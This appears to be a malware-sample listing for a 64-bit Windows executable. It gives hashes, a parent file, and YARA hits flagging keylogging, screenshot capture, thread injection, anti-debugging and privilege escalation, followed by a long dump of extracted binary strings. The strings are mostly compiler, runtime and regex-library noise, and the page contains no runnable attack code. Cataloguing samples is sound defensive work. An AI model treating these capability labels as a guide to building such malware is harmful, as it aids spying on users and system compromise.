Sample details: 04a198cb15a716c2c8d0aa862c2d846f --

Hashes
MD5: 04a198cb15a716c2c8d0aa862c2d846f
SHA1: f4a1ac1cf25d210a7db875561fb2b7f0aa16baee
SHA256: 124f5705345a62c4c9827c645042ae2618b15f0796bef56a554d826a4cf4d7c5
SSDEEP: 12288:p645udDD7033VWpbf1Wm2Heh4O4m9lirwB/b+/eM3qaG2qQGtTQfr3YUokbhykKJ:Y4s5D7cITh4O4m9liUj35QsQD3YUt+
Details
File Type: PE32+
Added: 2018-05-16 01:42:42
Yara Hits
YRP/Microsoft_Visual_Cpp_80_DLL | YRP/IsPE64 | YRP/IsWindowsGUI | YRP/IsBeyondImageSize | YRP/HasRichSignature | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/anti_dbg | YRP/inject_thread | YRP/escalate_priv | YRP/screenshot | YRP/keylogger | YRP/win_mutex | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/win_hook | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Internet_API |
Parent Files
bda232c2f3da0472e7bdb0df3d8a6151
Source
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.gfids
;^ r"H
;^ r"H
USVWATAUAVAWH
t$Iu)H
@8|$Xu
\$@t4L
A_A^A]A\_^[]
G#8G"r-
A9D$(t
Hc|$DA
A)FTHc
E A)FP
E$A)FT
E4A)FTI
ATAVAWH
A_A^A\
L$ SVWATAUAVAWH
A_A^A]A\_^[
t$ WATAUAVAWH
uzD8-}
A_A^A]A\_
L$ SVWH
u?9G,t!3
tcf90H
f97t%L
t$ AWH
USVWATAUAVAWH
L$XH;58
D$\D8k
D8l$Pu
d$Qfff
d$QfA;
t$TfA;
D$QfA;
t$TfA;
t$TfA;
t$TfA#
D$`8\$Pt!L
t$TfA#
D$`t#H
D$`t"L
A_A^A]A\_^[]
UVWATAUAVAWH
`A_A^A]A\_^]
USWATH
D$ht?A
L$D@85
|$xA8w7
G6A8w>t5;
YA8w:t"H;
siA8w?uGM;
WATAUAVAWH
n8\$pu
 A_A^A]A\_
@UVWAUH
tjL9d$@t3A
hA]_^]
uiH9|$8t
ubH9|$8t
H9|$0t
A8(uII
D8z tKD8z
uUfD9z
uHfD;=
t$ AVH
tUD8s"t&
|$ ATAVAWH
 A_A^A\
ATAUAWH
@A_A]A\
@8s(t5@85To
t.A87u
tND8k uH
u4fD9#t.
@A_A]A\
UVWATAUH
tbD8v#u
u:fD9v
u&fD9v
@A]A\_^]
VWATAVAWH
u;@8{ u5@8{
A_A^A\_^
|$ AVH
WATAUAVAWH
fD9l$@u
A_A^A]A\_
																
																															
																															
																
																															
																															
UVWATAUAVAWH
Hc|$0H
A_A^A]A\_^]
UATAUAVAWH
A_A^A]A\]
G98G8r
l$ WAVAW
|$ D8y<t1
I6D8{>
D8{=usD8{>tmfE
4GD8{4uDH
fD9|$ 
|$ ATAVAWH
A_A^A\
WAUAVH
0A^A]_
WAVAWH
L9{ uX@8s:uRD8s?uL@
 A_A^_
SUVWAUAVAWH
l$pf9/
fA9,$tLH
u)fA9,$u"
A_A^A]_^][
USVWATAUAVAWH
M@fD91u
u^@852@
A_A^A]A\_^[]
\$ UVAVH
u'@858p
USVWAWH
A__^[]
SUVWAWH
@A__^][
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
u4L9%GI
A_A^A]A\_^]
|$ AVH
L$@f91u
|$ AVH
L$PfD90H
																							
												
																					
L$ SUVWH
|$ AVH
UWATAUAWH
fD9d$0taH
fD9$Xu
fD9d$0taH
fD9$Xu
fD9d$0taH
fD9$Xu
A_A]A\_]
9YP~-3
9]X~)3
9{H~33
9{P~93
t$`t$H
|$ AVH
USVWATAUAVAWH
D8D$OtN
u4H;_8|
\$Df9]
D8iAt-L
fE9.t\3
D8l$`u
fD9/tOI
A_A^A]A\_^[]
|$ AVH
f9/tYH
X VWAUAVAWH
pA_A^A]_^
fD9<su
fD9>tHA
fD9?tEA
@WATAUAVAWH
L93t	H
0A_A^A]A\_
H93u\D8s
9P ~aH
T$L;QT|
A8yttDH
t$XtQf
\$`f9>
pH;D$h
>{u1E3
										
																															
																													
fA9,Bu
VWATAVAWH
 A_A^A\_^
USWATAVAWH
u&8L$@A
t$4fA97t>A
HcD$PH
|Hct$P
u`HcCT
A_A^A\_[]
							
																														
																																																		
																																								
																																															
																			
SUVWAUH
PA]_^][
USVWATAVAWH
A_A^A\_^[]
@UVAWH
l$ VATAUAVAW
A_A^A]A\^
@UVAUAVH
A^A]^]
A^A]^]
@SWATH
fD9l$0
G<9G8u(
u%8D$XL
9XT~;3
D$@tjH
@SATAUAVH
A^A]A\[
D\Pf9D$P
A^A]A\[
WAVAWH
 A_A^_
A0H9G`u
WAVAWH
 A_A^_
WATAUAVAWH
 A_A^A]A\_
																															
USVWATAUAVAW
rAH+E(D
A_A^A]A\_^[]
t3<kt/<rt+E3
C0H9A0
A0I9C0
C0H9A0
A0I9C0
\$hA8C
\$hu?f
SUVWATAUAVAWH
f98u,A
f98u,A
f98u,A
f98u0A
9f9>u"E
fA9>u!
A_A^A]A\_^][
L$ WATAUAVAWH
0A_A^A]A\_
VWATAVAWH
 A_A^A\_^
USVATAUAVAWH
D9t$hu
L$XD8q#u
A_A^A]A\^[]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
SUVWATAUAVAWH
A_A^A]A\_^][
UVWATAUAVAWH
t$(L+D$pI
0A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
\$ UVAUH
A(fE90u
|$ AVH
|$ AVH
WATAUAVAWH
rGD8h#u
0A_A^A]A\_
|$ AWH
<O9_H~UL
WAVAWH
UVWATAUAVAW
A_A^A]A\_^]
L$ SVWH
9{0~,H
UVWATAUAVAWH
fD9$Au
D$xfD9f
D8d$xL
D8L$qt
A_A^A]A\_^]
UVWAVAWH
A_A^_^]
SVWAUH
fD94Bu
USVWATAUAVAW
fE9'tc
fD9 t#
fD9e@u	
A_A^A]A\_^[]
																							
						
@SAVAW
IL95G<
l$ AVH
|$<+|$4H
\$8+\$0H
UVWATAUAVAWH
A_A^A]A\_^]
UAVAWH
WAVAWH
PA_A^_
|$ AVH
WAVAWH
PA_A^_
USWATAUH
A]A\_[]
A]A\_[]
A]A\_[]
@SWAWH
t[D8k#u
fD9,Ju
|$`t"H
@SVWAVAWH
A_A^_^[
A_A^_^[
1@8s#u
USVWAVAWH
A_A^_^[]
uqf93ulfA9u
uefA94$u^
u-f93u(fA9u
u!fA94$u
u0@8t$PH
A_A^_^[]
l$8@8k#u
L$H@8k#u
t$8@8k#u
H9l$8u
(@8k#u
WAVAWH
D82t.E
fD94Pu
fD94Pu
l$0@8k#u
H9l$0u
(@8k#u
H9l$0H
|$ ATAVAWH
HcT$0A
HcT$4A
+D$0Hc
+D$4Hc
@A_A^A\
USVWAVAWH
A_A^_^[]
A_A^_^[]
A_A^_^[]
u(8D$0H
u(8D$1H
u(8D$2H
A_A^_^[]
HcT$8A
HcT$<A
HcT$@A
HcT$DA
A_A^_^[]
A_A^_^[]
A_A^_^[]
@UATAUAVAWH
A_A^A]A\]
SUWATAUAVAWH
D+t$hA
A_A^A]A\_][
USVWATAUAVAWH
D;L$Pu5A
D;D$X}
Hc\$tL
D;l$X}
A_A^A]A\_^[]
|$ ATAVAWH
D9f(ua
;.u	;~
A_A^A\
t#D8%N
													
f9lT0u 
f9lD0u%
UVWATAVH
A^A\_^]
}/+}'C
]3+]+C
UVWAVAWH
A_A^_^]
t$(D93
utL9l$8uVfD
tRD8p#u
@SUVWAVH
@A^_^][
@A^_^][
@A^_^][
|$ UATAUAVAWH
fD9,Au
fD9l$P
t$8fD9/u
u)8D$0H
fD9l$P
u/D8l$0H
A_A^A]A\]
UVWATAUAVAWH
I;A0}(I
A_A^A]A\_^]
UAUAVH
@UWATAUAWH
@A_A]A\_]
VAUAWH
D$2fA9
D$0fA9
							
USVWAVH
A^_^[]
fD9<Au
fD9|$`
fD9<Au
A^_^[]
fD9<Au
fD9<Au
L$ WAVAWH
0A_A^_
USVATAUAWH
A_A]A\^[]
l$Pf93tgH
M09u(uaH
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAWH
A_A\_^]
t%fD9/t
fD9+t`
fD9,Xu
L$`H;L$XrHH
<#H;|$Xr
A_A\_^]
@VWATAUAVAWH
XA_A^A]A\_^
@UATAUAVAWH
A_A^A]A\]
@UVATAWH
(A_A\^]
(A_A\^]
UVWAVAWH
@A_A^_^]
@A_A^_^]
UVWAVAWH
@A_A^_^]
u8f9:u
H;D$@v	
H;D$@s[L
f9D$ptXE3
@UWAVH
2w	f95k
fD9<Cu
fD9<Cu
t4f9>t/H
|$ AVH
L$ UWATAVAWH
epA_A^A\_]
WAVAWH
UVWATAUAVAWH
fD9+u>
L;u@},
A_A^A]A\_^]
|$ ATAVAWH
D8c#u^H
u9D8c#u
fD9$^u
A_A^A\
SUVWATAWH
A_A\_^][
@UVWATAUAVAWH
A_A^A]A\_^]
@VATAUAVAWH
0A_A^A]A\^
0A_A^A]A\^
@SAUAVH
;k0}DHc
0A^A][
0A^A][
WATAUAVAWH
A_A^A]A\_
f9t$Bt
HcD$@H
UVWATAUAVAWH
;D$x~ULc
;\$x|"I
HcT$@A
A_A^A]A\_^]
UVWATAUAVAWH
?ERCPu
A_A^A]A\_^]
@SUVWATAUAWH
 A_A]A\_^][
 A_A]A\_^][
 A_A]A\_^][
 A_A]A\_^][
 A_A]A\_^][
 A_A]A\_^][
 A_A]A\_^][
 A_A]A\_^][
 A_A]A\_^][
SUVWATAUAVAWH
A_A^A]A\_^][
UVWATAUAVAWH
 A_A^A]A\_^]
l$ VWAUAVAWH
.H;|$xs!H
A_A^A]_^
t+f90t&H
t$ WAVAWH
L$XfD91u
t$ WATAWH
fD9<xu
<$D8{#u
u0D8{#u
0A_A\_
fA9:u'
|$ ATAVAWH
A_A^A\
UVWATAUAVAWH
`A_A^A]A\_^]
SUVWATAUAVAWH
8A_A^A]A\_^][
|$ AVH
WATAUAVAWH
uED8-r
0A_A^A]A\_
@SUVWATAUAWH
9oX~ L
A_A]A\_^][
\$ UWATAUAWH
w$HcG 
 A_A]A\_]
\$ UVWATAVH
A^A\_^]
t$ WATAVH
 A^A\_
USVWAUAWH
D$,fD9
D$,yeE3
A_A]_^[]
USVWAUAVH
zfD9/u
A^A]_^[]
\$ VAVAWH
x`H9wptsH
0A_A^^
UVWATAUAVAWH
fD9,Fu
uHfD9n
u5fD9n
A_A^A]A\_^]
\$ VWATAUAVH
 A^A]A\_^
\$ VWAV
t$ AVH
|$ AVH
\$ UWATAVAWH
thD9d$@uB
PA_A^A\_]
UVWATAUAVAWH
@A_A^A]A\_^]
@UVATAVH
A^A\^]
A^A\^]
|$ ATAVAWH
A_A^A\
\$ WATAVH
 A^A\_
 A^A\_
\$ UWATAUAWH
A_A]A\_]
t$ WAVAWH
fF9<@u
|$ AVH
L$ SWH
\$ WAVAWH
t$ WAVAWH
UVWATAUAVAWH
$/L;d$0rL
<+H;|$0
A_A^A]A\_^]
UATAUAVAWH
A_A^A]A\]
@UATAUAVAWH
A_A^A]A\]
USAUAVH
A^A][]
A^A][]
A^A][]
UAVAWH
t#f97t
D$xfA96t
USVWATAUAVAWH
A_A^A]A\_^[]
|$ AVH
D$pfB9L@
UATAUAVAWH
fD9$Au
A_A^A]A\]
f9\L0t?Hc
|$ ATAVAWH
0A_A^A\
l$ VWAWH
@USWAVH
@UVATAUAVAWH
|$PL9n
XA_A^A]A\^]
XA_A^A]A\^]
t$ WAVAWH
f;F u$H
@A_A^_
|$ AVH
SAUAVAWH
hA_A^A][
hA_A^A][
|$ AVH
f9\$ t,E3
H;A0t2H
@UAVAWH
UVWAVAWH
 A_A^_^]
UVWATAUAVAWH
A_A^A]A\_^]
SVWATAUAVAWH
PA_A^A]A\_^[
PA_A^A]A\_^[
@SAVAWH
@A_A^[
@A_A^[
H;Q wpf
|$@HcH0H
UVATAUAWH
A_A]A\^]
USVWATAUAVAW
x0Au	L
A_A^A]A\_^[]
UVWATAUAVAWH
I;P }}G
u ;~ }
e0A_A^A]A\_^]
H;5cX	
UVWATAUAVAWH
 A_A^A]A\_^]
WAVAWH
 A_A^_
 A_A^_
H;=(z	
t$HA8^
 A_A^_
SUWATAUH
`A]A\_][
`A]A\_][
VWATAUAWH
fD9+u8
fD9,Au
A_A]A\_^
WATAUAVAWH
H9l$@u
A_A^A]A\_
USVWAUAVAWH
D$8;G r
D+l$HH
T$T+T$L
A_A^A]_^[]
D$T+D$L
L$PD+L$H
t$@H;F
UVWAUAVAWH
A_A^A]_^]
A_A^A]_^]
u(8D$0H
u(8D$1H
u(8D$2H
D$X+D$P
u(8D$3H
D$\+D$T
A_A^A]_^]
|$@H9i
9k vmf
tGH;5:
f9l$ tPH
f9l$ tRH
f9l$ tLH
f9l$ tLH
f9l$ tMH
UVWATAUAVAWH
L;l$xrKH
<+H;|$xr.H
L;l$xrKH
/H;\$xr.H
L;l$xrKH
/H;\$xr.H
L;l$xrKH
/H;\$xr.H
L;l$xrKH
/H;\$xr.H
L;l$xrKH
/H;\$xr.H
A0;A sOL
u#HcE@
D8g	})
A_A^A]A\_^]
USVWATAUAWH
}gfE9<$
t	A	Eh
t	A	Ed
A_A]A\_^[]
SUVAUAVAWH
uzfA9F
tGfA9F
D$4A	M
;E s>H
E|McE|E3
A_A^A]^][
K VWAUAVH
v`<	t0<
fD9<Gu
A^A]_^
G	@t"3
;_ r"H
;_ sJH
USVWATAVAWH
fD9<Au
A_A^A\_^[]
fD9<pu
tB@8p#u
A;^ r#H
@UVWAWH
(D$pHc
UATAUAVAWH
T$TD;P 
L$T;N 
G	 u#H
u)M9j@
A_A^A]A\]
										
															
						
																																	
																																												
|$ AVH
WAVAWH
 A_A^_
McHDMc@@I
t-McH@
LcCxE3
9CDt?=
T$<+T$4
L$8+L$0
L$(+L$ f
L$,+L$$
UVWATAUAVAWH
D$@9D$8t
pA_A^A]A\_^]
l$ VAVAWH
L$8+L$0
D$<+D$4
WAVAWH
|!@8l$`t
@8l$`u
 A_A^_
@USAUAWH
xA_A][]
|$ AVH
|$ ATAVAWH
0A_A^A\
l$H@8wxuh
@UVWATAWH
A_A\_^]
SUVWATAVH
A^A\_^][
A^A\_^][
fA9.t@H9
*uxfA9n
@8k uR3
fA9.u$@8
D$Pf9(t
A^A\_^][
t$ AVH
9P(t H
|$ AUAVAWH
 A_A^A]
ATAVAWH
L9F8t+H
0A_A^A\
AUAVAWH
fD9$Fu
A_A^A]
@VWAVH
t1;Q@t,H
t$8t$@
|$0ui3
t4@85Yr
9H(tWH
9H(tBH
@UAVAWH
%@8{#u
@SVWAUAWH
 A_A]_^[
 A_A]_^[
 A_A]_^[
l$ WAVH
t$ Hcq0M
|$(HcT$@H
l$0A^_
H;{8|%H
H;{0|+H
UVWATAUAVAWH
ePA_A^A]A\_^]
@UWAVH
H9A u/H
WATAUAVAWH
 Hct$p3
I;_(~!I
 A_A^A]A\_
@UVAWH
UVWATAUAVAWH
u,H;u0}&H
t$(D;|$ u9A
fD9$Au
tVL)u8E;
uML)u0
~$H;u0}
@A_A^A]A\_^]
l$ VWAWH
u(H;u(t
|$ AVH
tOI;@0}
8I;@8}
UAVAWH
 A_A^]
 A_A^]
H9y u1H
WAVAWH
 A_A^_
WAVAWH
~Q;G ~
G 9G$u
0A_A^_
UATAUAVAWH
e A_A^A]A\]
VWATAVAWH
T$XD;T$\
A_A^A\_^
t$ WATAWH
WATAUAVAWH
t\D8{#u
A_A^A]A\_
L$ UVWATAVAWH
xA_A^A\_^]
xA_A^A\_^]
UVWATAUAVAWH
e`A_A^A]A\_^]
fD9<Ou
|$ UATAUAVAWH
A_A^A]A\]
D9m8v8I
,FD8k#u
fE9,~u
VWATAVAWH
A_A^A\_^
SUVWATAUAVH
@A^A]A\_^][
l$ WATAWH
 A_A\_
 A_A\_
@UVAWH
r#+^8H
L$ SVWAUH
HA]_^[
u7fE9w
u9fE9w
u6HcD$0H
t#I+UHD
HA]_^[
t$ WAVAWH
 A_A^_
A@D+APH
APH+A@
t$ WAVAWH
@A_A^_
L$`H+L$pH
L$ SWH
L$ UVAWH
@UVATAVH
(A^A\^]
(A^A\^]
SUATAVH
8A^A\][
8A^A\][
f97t*H
8A^A\][
@SVWAWH
l$hfff
8A__^[
t$ WATAUAVAWH
 A_A^A]A\_
SVWAVAWH
H;L$8rNH+
L;t$8rWI
A_A^_^[
A_A^_^[
f9;t4A
D$(+D$ +
D$,+D$$+
@USVWAUAVAWH
3fD91u
D8u_ue
L$HD8u_
D96tPH
D8t$@u5D8t$Au.H
L$HL9u
H9\$Ht	M
A_A^A]_^[]
VWATAUAWH
A_A]A\_^
UVWATAUAVAWH
epA_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
)f9l$ 
80utE3
t0H951
t1L9%0
l$ WATAUAVAWH
fD94zu
 A_A^A]A\_
A" ujHc
A" ujHc
ATAVAWH
D9aH~wA
D8c#t[
D9eP~wI
D8c#t[
\$PM9&t`E
E9'~MM
0A_A^A\
l$ AVH
|$ ATAVAWH
0A_A^A\
WAVAWH
PA_A^_
|$ ATAVAWH
A_A^A\
u%fA9	u
f92t+H
f92t H
L$ SUVWATAUAV
A^A]A\_^][
|$ AVH
9D$xuIA
rQf99t'H
WATAUAVAWH
A_A^A]A\_
t$8t H
f90t;H
f9t$0ttH
@VATAUAVAWH
 A_A^A]A\^
 A_A^A]A\^
\$ AVH
SVAUAWH
XA_A]^[
XA_A]^[
XA_A]^[
t$ WAVAWH
@A_A^_
H;_8s)
						
															
								
																									
|$ AV3
|$ AVH
SUVWATAVAWH
A_A^A\_^][
@8(t5D
						
USVWATAUAVAWH
IcL$`I
A+D$0H
A+D$0H
A+D$0H
A+D$0H
]tTfA;
]tGfA;
HI9MHvc
HI9MHw
HI9MHvff
HI9MHw
D$pA+D$0D
u/fB9D{
IcD$\D
4HIcL$`I
HI9L$Hr
A+L$(H
A+D$(H
A	D$pA;|$l~
t+L+Ux
A_A^A]A\_^[]
USVWATAUAVAWH
A_A^A]A\_^[]
UWATAUAVAWH
A_A^A]A\_]
ERCPE3
A_A^A]A\_]
}\Hcz,M
\$@u"E3
;rt	I;
IcR$Hk
IcR$Hk
t$\;t$T
D$PD;D$T
2IcR$Hk
(HcV$Hk
0HcV$Hk
<Cqt<A
CD;T$T|
D$P;D$T|
L$T9L$P
CHcL$X
L$P;L$T
L$P;L$T
t$X;t$P
2IcQ$Hk
 !"#$%%%%%%&&'()*+%%%%%%&&'()*+,,,,,,--./012QQQQQQQQ334556789999:;<;<=>=?@AB=?@ABQQQQQCDEFGHIJKLMN
USVWAUAWH
A_A]_^[]
A_A]_^[]
9|$Ht^
|$Xt@H
L$ SATAUH
 A]A\[
 A]A\[
 A]A\[
 A]A\[
 A]A\[
 H3E H3E
VWATAVAWH
A_A^A\_^
B(I9A(
UATAUAVAWH
G0Hc	H
L9`8tA
A_A^A]A\]
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
AUAVAWH
I9}(t9H
0A_A^A]
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
SVWATAUAVAWH
0A_A^A]A\_^[
WATAUAVAWH
r 9_ t
ri9V vdH
A_A^A]A\_
fA;8utI
fA;0t)fA98t
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
 A_A^A]A\_
ffffff
VWATAVAWH
 A_A^A\_^
x ATAVAWH
 A_A^A\
H;xXu9
@8|$Pt
@8|$Pt
@8l$8t
D$0H;G
t$ WATAUAVAWH
s4+sP+
A_A^A]A\_
t$ WATAUAVAWH
s4+sP+
A_A^A]A\_
t$ WAVAWH
 A_A^_
WATAUAVAWH
 A_A^A]A\_
t$ UWATAVAWH
D8d$Ht
D8d$Ht
A_A^A\_]
D8t$8t
l$ WAVAWH
 A_A^_
@UATAVH
t$ WATAUAVAWH
'D8l$@
t)D8l$@t
WD8l$@t
D8l$@t
A_A^A]A\_
t$ WATAUAVAWH
f;\$ts
rsf;\$ 
r_f;\$,
rKf;\$<
r7f;\$L
r#f;\$\s
f;\$ds
f;\$(r
f;\$0r
rvf;\$ 
rbf;\$,
rNf;\$<
r:f;\$L
r&f;\$\s
f;\$ds	D
A_A^A]A\_
u3HcH<H
USVWATAUAVAWH
f;T$(s
A_A^A]A\_^[]
?)tIf97t:
UVWATAUAVAWH
0A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
UVWATAUAVAWH
D$XD8p
L$D;L$T
L$P+L$8
D$XD90}
L$P+L$H
A_A^A]A\_^]
@UAVAWH
|$ AVH
WATAUAVAWH
 A_A^A]A\_
WAVAWH
 A_A^_
t	H9Q(t
t	H9Q8t
D$@H!D$ 3
fD9!u7A
UVWAVAWH
0A_A^_^]
WAVAWH
fA96tdH
fA94nu
0A_A^_
L$ WATAUAVAWH
@A_A^A]A\_
x ATAVAWH
 A_A^A\
9 w	f9
D82u&H
D8t$Ht
x ATAVAWH
gfffffffH
D8d$ht
A_A^A\
WATAUAVAWH
A_A^A]A\_
I9\$ ~@H
fD9t$b
WAVAWH
@A_A^_
WATAUAVAWH
 A_A^A]A\_
@UATAUAVAWH
e0A_A^A]A\]
@UATAUAVAWH
H!T$0D
uf!T$(H!T$ 
A_A^A]A\]
f9*u	H
UVWATAUAVAWH
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
WATAUAVAWH
 A_A^A]A\_
\$ UVWATAUAVAWH
H!D$ E
D08@t	
`A_A^A]A\_^]
UVWATAUAVAWH
fA9<Bu
fC9<hu
A_A^A]A\_^]
WATAUAVAWH
fD9,yu
0A_A^A]A\_
\$ UVWAVAWH
A_A^_^]
f9|$^t&f
f9|$`t
l$ VWATAVAWH
L$&@8t$&t0@8q
A81t@@8r
A_A^A\_^
SVWATAUAWH
HA_A]A\_^[
ATAVAWH
0A_A^A\
fD9	t(I
@USVWATAUAVAWH
D8l$ht
A_A^A]A\_^[]
s WAVAWH
0A_A^_
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
 A_A^A]A\_
ffffff
fffffff
|$ ATAVAWH
\$@@8=
 A_A^A\
WAVAWH
 A_A^_
@SUVWATAUAVAWH
D88Hte
8A_A^A]A\_^][
SUVWATAUAVAWH
D88Ht!
D98Ht;H
8A_A^A]A\_^][
UVWATAUAVAWH
D(8Ht}
`A_A^A]A\_^]
USVWAVH
A^_^[]
LcA<E3
VWATAUAVAWL
|$XHcU
D$8HcJ
H;D$Pu
l$HA_A^A]A\_^
x AVHcA
SUVWATAUAVAWH
H9D$PuCI
A_A^A]A\_^][
WATAUAVAWH
A_A^A]A\_
)t$ H#
>ffffff
fffffff
ffffff
fffffff
fffffff
fffffff
fffffff
fffffff
ffffff
fffffff
fffffff
fffffff
fffffff
ffffff
fffffff
fffffff
fffffff
^8U)zj
0ffffff
InitializeConditionVariable
SleepConditionVariableCS
WakeAllConditionVariable
Unknown exception
bad allocation
bad array new length
bad exception
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
 delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
 new[]
 delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator "" 
 Type Descriptor'
 Base Class Descriptor at (
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`h````
xpxxxx
(null)
CorExitProcess
[aOni*{
~ $s%r
@b;zO]
v2!L.2
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
GetCurrentPackageId
LCMapStringEx
LocaleNameToLCID
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
1<.	/>:
/>58d%
>jtm}S
)>6{1n
r	Vr.>T
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^	c:>
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
	kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
no error
\ at end of pattern
\c at end of pattern
unrecognized character follows \
numbers out of order in {} quantifier
number too big in {} quantifier
missing terminating ] for character class
invalid escape sequence in character class
range out of order in character class
nothing to repeat
operand of unlimited repeat could match the empty string
internal error: unexpected repeat
unrecognized character after (? or (?-
POSIX named classes are supported only within a class
missing )
reference to non-existent subpattern
erroffset passed as NULL
unknown option bit(s) set
missing ) after comment
parentheses nested too deeply
regular expression is too large
failed to get memory
unmatched parentheses
internal error: code overflow
unrecognized character after (?<
lookbehind assertion is not fixed length
malformed number or name after (?(
conditional group contains more than two branches
assertion expected after (?(
(?R or (?[+-]digits must be followed by )
unknown POSIX class name
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
spare error
character value in \x{...} sequence is too large
invalid condition (?(0)
\C not allowed in lookbehind assertion
PCRE does not support \L, \l, \N{name}, \U, or \u
number after (?C is > 255
closing ) for (?C expected
recursive call could loop indefinitely
unrecognized character after (?P
syntax error in subpattern name (missing terminator)
two named subpatterns have the same name
invalid UTF-8 string
support for \P, \p, and \X has not been compiled
malformed \P or \p sequence
unknown property name after \P or \p
subpattern name is too long (maximum 32 characters)
too many named subpatterns (maximum 10000)
repeated subpattern is too long
octal value is greater than \377 in 8-bit non-UTF-8 mode
internal error: overran compiling workspace
internal error: previously-checked referenced subpattern not found
DEFINE group contains more than one branch
repeating a DEFINE group is not allowed
inconsistent NEWLINE options
\g is not followed by a braced, angle-bracketed, or quoted name/number or by a plain number
a numbered reference must not be zero
an argument is not allowed for (*ACCEPT), (*FAIL), or (*COMMIT)
(*VERB) not recognized
number is too big
subpattern name expected
digit expected after (?+
] is an invalid data character in JavaScript compatibility mode
different names for subpatterns of the same number are not allowed
(*MARK) must have an argument
this version of PCRE is not compiled with Unicode property support
\c must be followed by an ASCII character
\k is not followed by a braced, angle-bracketed, or quoted name
internal error: unknown opcode in find_fixedlength()
\N is not supported in a class
too many forward references
disallowed Unicode code point (>= 0xd800 && <= 0xdfff)
invalid UTF-16 string
xdigit
ACCEPT
COMMIT
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
Arabic
Armenian
Avestan
Balinese
Bengali
Bopomofo
Brahmi
Braille
Buginese
Canadian_Aboriginal
Carian
Cherokee
Common
Coptic
Cuneiform
Cypriot
Cyrillic
Deseret
Devanagari
Egyptian_Hieroglyphs
Ethiopic
Georgian
Glagolitic
Gothic
Gujarati
Gurmukhi
Hangul
Hanunoo
Hebrew
Hiragana
Imperial_Aramaic
Inherited
Inscriptional_Pahlavi
Inscriptional_Parthian
Javanese
Kaithi
Kannada
Katakana
Kayah_Li
Kharoshthi
Lepcha
Linear_B
Lycian
Lydian
Malayalam
Mandaic
Meetei_Mayek
Mongolian
Myanmar
New_Tai_Lue
Ol_Chiki
Old_Italic
Old_Persian
Old_South_Arabian
Old_Turkic
Osmanya
Phags_Pa
Phoenician
Rejang
Samaritan
Saurashtra
Shavian
Sinhala
Sundanese
Syloti_Nagri
Syriac
Tagalog
Tagbanwa
Tai_Le
Tai_Tham
Tai_Viet
Telugu
Thaana
Tibetan
Tifinagh
Ugaritic
 !""#$%&'((()*+,-./0123456789:;<=>?@AABCDEFGHFIJKKALAAM
NOPQRSTUVWXYZ[\F]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]^]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]_`aaaaaaaabccdefghijklmno"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""pqqqqqqqqqqqqqqqqrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr]]stuvwwxyz{|}~
